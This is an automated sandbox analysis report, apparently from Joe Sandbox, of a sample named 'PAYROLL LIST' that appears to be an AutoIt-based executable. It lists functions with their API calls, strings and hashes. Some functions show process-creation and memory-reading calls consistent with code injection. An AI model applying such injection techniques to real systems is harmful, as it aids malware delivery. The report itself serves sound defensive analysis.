Instruction Fuzzy Hash: 9391A176504305AFCB20EB54DA91F9BB3F8BF94704F04482DF9599B291DB30EA48CB92

Function 00A6BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A6BDB4: __time64.LIBCMT ref: 00A6BDBE

Part of subcall function 00A24517: _fseek.LIBCMT ref: 00A2452F

__wsplitpath.LIBCMT ref: 00A6C083

Part of subcall function 00A41DFC: __wsplitpath_helper.LIBCMT ref: 00A41E3C

_wcscpy.LIBCMT ref: 00A6C096
_wcscat.LIBCMT ref: 00A6C0A9
__wsplitpath.LIBCMT ref: 00A6C0CE
_wcscat.LIBCMT ref: 00A6C0E4
_wcscat.LIBCMT ref: 00A6C0F7
_wcscmp.LIBCMT ref: 00A6C03E

Part of subcall function 00A6C56D: _wcscmp.LIBCMT ref: 00A6C65D
Part of subcall function 00A6C56D: _wcscmp.LIBCMT ref: 00A6C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A6C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A6C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A6C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A6C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A6C371

Strings

p1#v`K$v, xrefs: 00A6C2A1, 00A6C338, 00A6C35F, 00A6C371

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID: p1#v`K$v
API String ID: 2378138488-1068180069
Opcode ID: a8fae11e607cd556f3b5c4170942e61b6e01e044e1fdd034db91c338866582f3
Instruction ID: c2b3d6373cbbae0d7bed8ec6b345bc04738154b24fee661e97a2f4413c3fc5fa
Opcode Fuzzy Hash: a8fae11e607cd556f3b5c4170942e61b6e01e044e1fdd034db91c338866582f3
Instruction Fuzzy Hash: CEC11AB1E00229AFDF11DFA5CD81EEEB7BDAF49310F0040A6F649E6151DB709A848F61

Function 00A23F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A23F86
RegisterClassExW.USER32(00000030), ref: 00A23FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23FC1
InitCommonControlsEx.COMCTL32(?), ref: 00A23FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A23FEE
LoadIconW.USER32(000000A9), ref: 00A24004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A24013

Strings

AutoIt v3 GUI, xrefs: 00A23FA2
0, xrefs: 00A23F68
+, xrefs: 00A23F6F
TaskbarCreated, xrefs: 00A23FB6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 85c76fbdb3f56966f96e8bb8efba206dcf3e97b03a60341ab0c4c1d4b089082f
Instruction ID: a7efdff62c18be183a9213fe11d81a72dcb8efa9fab436d393156ae1cde78f99
Opcode Fuzzy Hash: 85c76fbdb3f56966f96e8bb8efba206dcf3e97b03a60341ab0c4c1d4b089082f
Instruction Fuzzy Hash: 5F21C4B5900359AFDB00DFE4E889BCDBBB5FB09700F00461AF652AA2A0D7B44546CF91

Function 00A23742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A237B3
KillTimer.USER32(?,00000001), ref: 00A237DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A23800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A2380B
CreatePopupMenu.USER32 ref: 00A2381F
PostQuitMessage.USER32(00000000), ref: 00A2382E

Strings

TaskbarCreated, xrefs: 00A23806

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c7cc9ae3d4fb971505302ab6541e11d788300629de113c90d6a5f01a7914b444
Instruction ID: 93790549a1630826fe6493f1e4fec884fbfd641035a2e87c5db4c8b39494d95b
Opcode Fuzzy Hash: c7cc9ae3d4fb971505302ab6541e11d788300629de113c90d6a5f01a7914b444
Instruction Fuzzy Hash: CA4128F22142B6ABDF14DFACBD8AF7936A5F716300F040135FA02961D1CB789E518761

Function 00A23E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A23E79
LoadCursorW.USER32(00000000,00007F00), ref: 00A23E88
LoadIconW.USER32(00000063), ref: 00A23E9E
LoadIconW.USER32(000000A4), ref: 00A23EB0
LoadIconW.USER32(000000A2), ref: 00A23EC2

Part of subcall function 00A24024: LoadImageW.USER32(00A20000,00000063,00000001,00000010,00000010,00000000), ref: 00A24048

RegisterClassExW.USER32(?), ref: 00A23F30

Part of subcall function 00A23F53: GetSysColorBrush.USER32(0000000F), ref: 00A23F86
Part of subcall function 00A23F53: RegisterClassExW.USER32(00000030), ref: 00A23FB0
Part of subcall function 00A23F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23FC1
Part of subcall function 00A23F53: InitCommonControlsEx.COMCTL32(?), ref: 00A23FDE
Part of subcall function 00A23F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A23FEE
Part of subcall function 00A23F53: LoadIconW.USER32(000000A9), ref: 00A24004
Part of subcall function 00A23F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A24013

Strings

AutoIt v3, xrefs: 00A23F1F
#, xrefs: 00A23F09
0, xrefs: 00A23F02

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 787a2ce93c06347c14d189d6f373ab344bded69c344bde86369b76204583a7dc
Instruction ID: 3626c0d0f310a4a5fce5f8d587f6f6f024ab6d4052eb45c83750638e0bcb7809
Opcode Fuzzy Hash: 787a2ce93c06347c14d189d6f373ab344bded69c344bde86369b76204583a7dc
Instruction Fuzzy Hash: 80213EB1E00364ABCB04DFE9ED85A99BBF5EB49310F00422EE615AA2A0D77546468F91

Function 00A4ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00A4ACC1

Part of subcall function 00A47CF4: __mtinitlocknum.LIBCMT ref: 00A47D06
Part of subcall function 00A47CF4: EnterCriticalSection.KERNEL32(00000000,?,00A47ADD,0000000D), ref: 00A47D1F

__calloc_crt.LIBCMT ref: 00A4ACD2

Part of subcall function 00A46986: __calloc_impl.LIBCMT ref: 00A46995
Part of subcall function 00A46986: Sleep.KERNEL32(00000000,000003BC,00A3F507,?,0000000E), ref: 00A469AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00A4ACED
GetStartupInfoW.KERNEL32(?,00AD6E28,00000064,00A45E91,00AD6C70,00000014), ref: 00A4AD46
__calloc_crt.LIBCMT ref: 00A4AD91
GetFileType.KERNEL32(00000001), ref: 00A4ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00A4AE11

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: f1c35fe2dd339b3b4c4a85a7a643cbc38e7ca727f42e7a5771ede1be28d3a5e3
Instruction ID: 01a3f299ccd68c03bbfbf438ab0a6740bd4f497488da7fe1f8c32069caf95a29
Opcode Fuzzy Hash: f1c35fe2dd339b3b4c4a85a7a643cbc38e7ca727f42e7a5771ede1be28d3a5e3
Instruction Fuzzy Hash: A2810575D453518FDB24CFA8C8816ADBBF0AF9A324B24426DD4B6AB3D1C7349803CB52

Function 00BA91D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BA92A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BA94C7

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: a4fd303e6acae8d1c303804dbd58a0eb5f8134fe79cc4d28b21ed58c80a19cb4
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 73A11674E04209EBDF14CFA4C894BAEB7B5FF49304F208199E111AB280DB759A45DB55

Function 00A249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00A24A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A941DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A9421A
RegCloseKey.ADVAPI32(?), ref: 00A94249

Strings

Include, xrefs: 00A941D3, 00A94212
Software\AutoIt v3\AutoIt, xrefs: 00A24A13

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 8a77aeee84e261d0b7e452cbe97f483ea01e5f2fdf87b55e869f56f6ed20b828
Instruction ID: 4569bc8ee7569885b00b0974469906718aee3ecfa71526b8176fe54348c1e770
Opcode Fuzzy Hash: 8a77aeee84e261d0b7e452cbe97f483ea01e5f2fdf87b55e869f56f6ed20b828
Instruction Fuzzy Hash: 00116D75A00119BFEB00EBA8DE86DEF7BBCEF09344F000065B502D7192EB709E029750

Function 00A236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A236E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23707
ShowWindow.USER32(00000000,?,?,?,?,00A23AA3,?), ref: 00A2371B
ShowWindow.USER32(00000000,?,?,?,?,00A23AA3,?), ref: 00A23724

Strings

edit, xrefs: 00A23701
AutoIt v3, xrefs: 00A236DE, 00A236E3, 00A236E4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 34653f417ae22477402856f23c73556c33b7ff426f11e10d116746d957a9e1a9
Instruction ID: 6ff5311e0d5cdd2fce9b7e87b845d6c5a23844d62c8aee107361b58f852b40b5
Opcode Fuzzy Hash: 34653f417ae22477402856f23c73556c33b7ff426f11e10d116746d957a9e1a9
Instruction Fuzzy Hash: 27F0DA755402E07AEB71D797AC88E672E7DD7C7F60B00001EBA05AA1A0D67108D6DBB0

Function 00BA8F70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BA8E60: Sleep.KERNELBASE(000001F4), ref: 00BA8E71

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA90C7

Strings

8I4T3YYVH6HIIIJAEU2JW2IZL, xrefs: 00BA912A, 00BA912D

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: CreateFileSleep
String ID: 8I4T3YYVH6HIIIJAEU2JW2IZL
API String ID: 2694422964-1571194564
Opcode ID: 396e662bc9244a23f49d677f94664726114c81e7c57622a21cf3c68f37cb82bd
Instruction ID: 6a14b0ca05a27435e06d5e98b27cd90e8d0c4b5e9b15f6c6b54f89b8f4f5142d
Opcode Fuzzy Hash: 396e662bc9244a23f49d677f94664726114c81e7c57622a21cf3c68f37cb82bd
Instruction Fuzzy Hash: 4E619530D08248EAEF11D7F4D848BEEBBB5AF15304F044199E248BB2C1D7BA1B49CB65

Function 00A24139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00A241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A239FE,?,00000001), ref: 00A241DB

_free.LIBCMT ref: 00A936B7
_free.LIBCMT ref: 00A936FE

Part of subcall function 00A2C833: __wsplitpath.LIBCMT ref: 00A2C93E
Part of subcall function 00A2C833: _wcscpy.LIBCMT ref: 00A2C953
Part of subcall function 00A2C833: _wcscat.LIBCMT ref: 00A2C968
Part of subcall function 00A2C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00A2C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A93491
Bad directive syntax error, xrefs: 00A936E4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: fe4398432dbf1d2a2fcd7c2c38b66cdcbc4868056bcdef01840304c27d3b6a8a
Instruction ID: 3b26e7dbc2033de597bb20c21c855489fdf6f79cfe4be3d7b5045289447a8d71
Opcode Fuzzy Hash: fe4398432dbf1d2a2fcd7c2c38b66cdcbc4868056bcdef01840304c27d3b6a8a
Instruction Fuzzy Hash: 9F918272A10229EFCF04EFA8DD919EEB7B4FF18310F10442AF516AB291DB749A45CB50

Function 00A24A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A25374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AE1148,?,00A261FF,?,00000000,00000001,00000000), ref: 00A25392

Part of subcall function 00A249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00A24A1D

_wcscat.LIBCMT ref: 00A92D80
_wcscat.LIBCMT ref: 00A92DB5

Strings

\Include\, xrefs: 00A24B0A
\, xrefs: 00A92DA2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: d20dc6599a529c44fa277419be16131e73c7d9c1c9118cb81eb84899d1eeac6f
Instruction ID: 8371378b0337c27bae5f760380896fdc469c5748c9018606f1c339c40944f38f
Opcode Fuzzy Hash: d20dc6599a529c44fa277419be16131e73c7d9c1c9118cb81eb84899d1eeac6f
Instruction Fuzzy Hash: 375163754043809FC714EFA9EAD1A9AB7FCFF59300B40463EF6448B261EB709A05CB52

Function 00A434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00A434FE

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00A43539
__wopenfile.LIBCMT ref: 00A43549

Strings

<G, xrefs: 00A434CD, 00A434F0, 00A434FC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 15c2f55b3cb57a9f06df88f2fe7d36ac0e1d3685f176250c01c9e15e236cac38
Instruction ID: 3858b48c263e08954cb2184ec24fc0ee2ad809ad4cc22dc28da460617a94affe
Opcode Fuzzy Hash: 15c2f55b3cb57a9f06df88f2fe7d36ac0e1d3685f176250c01c9e15e236cac38
Instruction Fuzzy Hash: 2311CA7AA00206EFDF51BFB48D426BE36B4BFC5350B158925E415D7281EB34CA0197A2

Function 00A3D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A3D28B,SwapMouseButtons,00000004,?), ref: 00A3D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A3D28B,SwapMouseButtons,00000004,?,?,?,?,00A3C865), ref: 00A3D2DD
RegCloseKey.KERNELBASE(00000000,?,?,00A3D28B,SwapMouseButtons,00000004,?,?,?,?,00A3C865), ref: 00A3D2FF

Strings

Control Panel\Mouse, xrefs: 00A3D2BA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a31a3e8ebad46acad6ff002f3377c8a09737426afe374b547923272ced8e974a
Instruction ID: 46ebdbff9c8404763cd1322a6406b0060a9dc26138ed40ee02319f681ef90b3e
Opcode Fuzzy Hash: a31a3e8ebad46acad6ff002f3377c8a09737426afe374b547923272ced8e974a
Instruction Fuzzy Hash: 16111575611209FFDB209FA4E884EAF7BB8EF45744F104469B906DB210E731AE419B60

Function 00BA7E60 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00BA861B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA86B1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BA86D3

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction ID: 587387bbe63527d921689c338c9ffcf44ea9b533cff644d7a3d33b58b8341435
Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction Fuzzy Hash: 2C621F70A14258DBEB24CFA4C850BEEB3B1EF59300F1091A9D10DEB794EB759E81CB59

Function 00A6C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00A24517: _fseek.LIBCMT ref: 00A2452F

Part of subcall function 00A6C56D: _wcscmp.LIBCMT ref: 00A6C65D
Part of subcall function 00A6C56D: _wcscmp.LIBCMT ref: 00A6C670

_free.LIBCMT ref: 00A6C4DD
_free.LIBCMT ref: 00A6C4E4
_free.LIBCMT ref: 00A6C54F

Part of subcall function 00A41C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00A47A85), ref: 00A41CB1
Part of subcall function 00A41C9D: GetLastError.KERNEL32(00000000,?,00A47A85), ref: 00A41CC3

_free.LIBCMT ref: 00A6C557

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: 59c5ed61994e343b7c010f77c90b30c6717ab482f22340847a281cd7a2248da3
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
